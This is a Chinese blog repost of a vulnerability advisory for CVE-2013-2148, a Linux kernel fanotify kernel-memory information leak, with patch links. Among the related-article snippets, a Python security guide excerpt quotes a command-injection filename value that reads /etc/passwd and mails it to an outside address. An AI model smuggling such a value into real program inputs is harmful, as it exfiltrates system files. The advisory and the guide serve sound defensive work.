Linux kernel ‘fill_event_metadata’函数资源管理错误漏洞

最新推荐文章于 2024-05-17 05:13:20 发布
最新推荐文章于 2024-05-17 05:13:20 发布
阅读量94 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/security4399/archive/2013/06/09/3128118.html
版权

漏洞名称:Linux kernel ‘fill_event_metadata’函数资源管理错误漏洞
CNNVD编号:CNNVD-201306-133
发布时间:2013-06-08
更新时间:2013-06-08
危害等级:低危  低危
漏洞类型:资源管理错误
威胁类型:本地
CVE编号:CVE-2013-2148

Linux Kernel是美国Linux基金会发布的开放源码操作系统Linux所使用的内核。 
        Linux kernel 3.9.4及之前的版本中的fs/notify/fanotify/fanotify_user.c中的‘fill_event_metadata’函数中存在漏洞,该漏洞源于程序没有正确初始化特定的结构成员变量。本地攻击者可通过fanotify描述符上的读操作利用该漏洞从内核内存中获得敏感信息。

目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接: 
        http://www.openwall.com/lists/oss-security/2013/06/05/26

来源: bugzilla.redhat.com 
链接:https://bugzilla.redhat.com/show_bug.cgi?id=971258 


来源: MLIST 
名称: [oss-security] 20130605 Re: CVE Request: Linux kernel: fanotify: info leak in copy_event_to_user 
链接:http://www.openwall.com/lists/oss-security/2013/06/05/26 


来源: MLIST 
名称: [linux-kernel] 20130603 [patch] fanotify: info leak in copy_event_to_user() 
链接:http://lkml.org/lkml/2013/6/3/128

转载于:https://www.cnblogs.com/security4399/archive/2013/06/09/3128118.html

weixin_30613343
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Linux kernel 资源管理错误漏洞
weixin_30437337的博客
06-09 426
漏洞名称: Linux kernel 资源管理错误漏洞 CNNVD编号: CNNVD-201306-132 发布时间: 2013-06-08 更新时间: 2013-06-08 危害等级: 低危 漏洞类型: 资源管理错误 威胁类型: 本地 CVE编号: CVE-2013-21...
python网络攻击总参三部_注入攻击等Python语言中的十个常见安全漏洞,附修复及避免方法...
weixin_39704971的博客
11-23 579
编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL 注入...
Python 开发中 10 个常见的安全漏洞_python安全漏洞(1)
m0_60453176的博客
05-17 885
命令注入可能在使用popen、subprocess、os.system 调用一个进程并从变量中获取参数时发生,当调用本地命令时,有人可能会将某些值设置为恶意值。下面是个简单的脚本,使用用户提供的文件名调用子进程:攻击者会将filename 的值设置为“;cat / etc / passwd | mailthem@domain.com 或者其他同样危险的东西。
安全漏洞干货-linux漏洞修复命令
明哥哥知识分享
09-23 798
1、漏洞名称:RHSA-2019:2197: elfutils security,bug fix,和 enhancement update 修复命令:yum update elfutils-default-yama-scope -y &&yum update elfutils-libelf -y &&yum update elfutils-libs -y cve编号:CVE-2018-16062,CVE-2018-16402,CVE-2018-16403,CVE-2018-1
python资源管理错误漏洞_Python 资源管理错误漏洞|CVE-2019-9674|CNNVD-202002-041|互联网安全漏洞库 | 指尖安全 | 垂直互联网安全媒体...
weixin_28688791的博客
02-21 930
来源:python-security.readthedocs.io链接:https://python-security.readthedocs.io/security.html#archives-and-zip-bomb来源:github.com链接:https://github.com/python/cpython/blob/master/Lib/zipfile.py来源:bugs.python...
982_EXIF_MetaData.zip_Metadata DELPHI_exif
07-15
Get exif metadata. delphu sample
Oracle-metadata.rar_metadata oracle_oracle_oracle metadata_oracl
09-23
此外,Oracle的动态性能视图(如`V$SESSION`,`V$SYSTEM_EVENT`)提供了运行时数据库的状态,对性能分析非常有帮助。 在实际操作中,我们经常需要编写SQL脚本来自动化获取和处理元数据信息,例如创建报告、监控...
[Oracle] dbms_metadata.get_ddl 的使用方法总结
09-10
Oracle数据库中的`dbms_metadata.get_ddl`是一个非常实用的包,它允许开发人员和管理员获取数据库对象的创建语句(DDL),这对于备份和恢复、迁移或者理解对象定义非常有帮助。下面我们将深入探讨`dbms_metadata.get...
SAP FRC接口调用calling RFC_METADATA_GET -- see log for details报错解决方案
08-23
老的DLL库在获取接口实例时,会触发“RFC_METADATA_GET”,7700版本的SAP可能没有了这个函数。 解决的办法: 升级sapnco的SDK。附件是2022.07发布的SDK,直接替换即可使用。亲测.net4.0-4.8的版本均可正常使用。 ...
CameraMetadata _ Android开发者.html
07-31
google官方文档,有时候没有外网的可以看一下,坐下备份
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
CVE-2019-11043:Neex的(PoC)CVE-2019-11043 Python版本
03-08
PoC CVE-2019-11043 CVE-2019-11043漏洞利用的Python版本 此PoC仍然是草稿,请使用编写的漏洞利用漏洞分析: : PoC设定 只需运行docker compose即可启动nginx和php-fpm: # docker-compose up -d Creating network " cve-2019-11043-git_app_net " with driver " bridge " Creating php ... done Creating nginx ... done 如果您想阅读php-fpm日志,可以运行: docker logs --tail 10 --follow php 开发 # python3 exploit.py --url http://localhost/index.php [ * ] QSL candidate:
Python安全漏洞及防护总结
m0_49706119的博客
07-26 3977
Python安全漏洞及防护总结
python资源管理错误漏洞_国家信息安全漏洞
weixin_42467411的博客
02-21 757
参考网址来源:CONFIRM链接:https://bugs.python.org/issue32981来源:MLIST链接:https://lists.debian.org/debian-lts-announce/2018/09/msg00031.html来源:FEDORA链接:https://lists.fedoraproject.org/archives/list/package-announ...
HTTP/2 资源管理错误漏洞(CVE-2019-9513)脆弱性分析报表修复
热门推荐
懂哥的博客
03-12 2万+
一、概述 nginx 1.16.1 稳定版和 nginx 1.17.3 主线版发布 修复安全问题 nginx 1.17.3 安全:当使用 HTTP/2 时,客户端可能会导致过多的内存消耗和 CPU 使用 (CVE-2019-9511, CVE-2019-9513, CVE-2019-9516) Bugfix:使用 gzipping 时 "zero size buf" 警告可能会出现在日志中...
Python常见安全漏洞及修复方法集合!你所不会的这里都有!
weixin_33895695的博客
11-17 443
概述编写安全的代码很困难,当你学习一门编程语言、一个模块或框架时,你会学习其使用方法。在考虑安全性时,你需要考虑如何避免代码被滥用,Python也不例外,即使在标准库中,也存在着许多糟糕的实例。然而,许多 Python 开发人员却根本不知道这些。以下是我总结的10个Python常见安全漏洞,排名不分先后。1、输入注入注入攻击影响广泛且很常见,注入有很多种类,它们影响所有的语言、框架和环境。SQL ...
python资源管理错误漏洞_Python系列之——某上网行为管理系统getshell漏洞挖掘到exp编写...
weixin_40002692的博客
12-08 365
本文作者:奶权 ,本文属i春秋原创奖励计划,未经许可禁止转载!0x00 前言之前写了两篇关于漏洞挖掘再到exp编写的文章受到了绝大部分的观众好评所以今天就再写一篇 让各位过过瘾0x01 漏洞分析由于今天演示的系统各大政府机构和公安机构都在使用所以暂不公布该系统漏洞文件:preview.php(通过搜索fopen这类的文件操作函数定位到的)代码片段:图片1.png (45.37 KB, 下载次数: ...
看我如何发现(并修复)Python 源代码中的漏洞
smellycat000的专栏
01-04 530
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士James Kettle 此前曾就 web 缓存投毒发布了一篇研究文章,本文作者为了更深入地了解这个领域的知识并查找开源领域中的相关漏洞...
#define SQLITE_ENABLE_COLUMN_METADATA 1
最新发布
07-02
`#define SQLITE_ENABLE_COLUMN_METADATA 1` 是一个预处理器宏定义,它通常用于SQLite数据库引擎的配置。当这个宏被设置为1时,SQLite会启用列元数据(column metadata)功能。列元数据包括列的名称、数据类型、长度...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值